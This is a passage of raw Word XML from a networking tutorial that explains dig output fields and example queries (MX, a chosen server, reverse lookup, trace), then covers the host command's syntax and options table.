    <w:p w14:paraId="232A7CE7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DiG 9.16.1-Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Version of dig command being used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30067EF6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUERY, status: NOERROR</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Successful DNS query with no errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441836E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>id: 12345</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Query identifier for matching requests and responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605BC131" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flags: qr rd ra</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Query response (qr), recursion desired (rd), recursion available (ra)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F516A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUERY: 1, ANSWER: 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: One question asked, one answer received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B31677" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EDNS: version: 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Extended DNS support enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5271AD98" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUESTION SECTION</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows what was asked (A record for google.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D7C4E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ANSWER SECTION</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Contains the actual response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C369F3D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>google.com. 300 IN A 142.251.46.142</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Domain has IP 142.251.46.142, TTL 300 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5687DE5F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Query time: 12 msec</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: DNS server responded in 12 milliseconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356ABC0D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SERVER: 127.0.0.53</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Used systemd-resolved local DNS resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD1AE2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSG SIZE rcvd: 55</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Response was 55 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD39FA" w14:textId="221642A0" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Query MX records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D65F88C"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dig google.com MX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCECB3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711160B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ANSWER SECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B78C6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oogle.com.             3600    IN      MX      10 smtp.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692B32D" w14:textId="3687E86C" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Query specific DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F071B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dig @8.8.8.8 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6746F49C" w14:textId="04F43038" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Reverse DNS lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822E5E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dig -x 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDBAC75" w14:textId="41180823" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Trace DNS resolution path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F73EBE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dig +trace google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2DF03C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Understanding the complete DNS resolution process from root servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665F62D" w14:textId="7EA1552D" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A20806" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command is a simple DNS lookup utility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031A8255" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06BA8A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Perform DNS lookups in a simple, easy-to-read format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F1ACD" w14:textId="3D83109F" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7623ECB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host [options] name [server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CCB78" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1371"/>
        <w:gridCol w:w="5579"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="09D56CAC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4656B434" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074C012A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0C55B41A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BB6AFB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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A80DAC7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List all records (equivalent to -v -t ANY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1D2F6084" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EEAF893"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c CLASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="274F02E9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Query class (IN, CH, HS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6BE242EA" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D966073"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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CFEF3F8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Compare SOA records on all authoritative nameservers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="523DC471" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="622DF255"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d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B6934E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Enable debug mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="08EE106E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26A60A3B"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l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE3317B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List all hosts in a domain (zone transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="28D1096E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FF9102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i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00ED4086" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IP6.INT for IPv6 reverse lookups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="43643404" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76639601"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 NDOTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="657E8FEC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set number of dots for absolute names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="031D6219" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="762C4AC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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C3D9F85" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Disable recursive queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7D149B44" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19491614"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 RETRIES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E0AB33" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set number of retries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="22ACB881" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A957472"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72A0ECE3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't send queries, just print what would be sent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4012449F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="572EE00A"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t TYPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C55BBCC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Query for specific record type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="710A7DEB" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17DF547E"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T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB9193F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use TCP for queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="522A5F99" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A8DA04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U</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="664A79AA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use UDP for queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="70575CD6" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA25F8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v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76387E6F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3899285E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="629168F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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F74A2DE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Wait forever for reply</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="365BC364" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66AE729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W TIMEOUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D6EFFE5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set timeout for queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7B320509" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7963ACF0"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FEE7CAD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
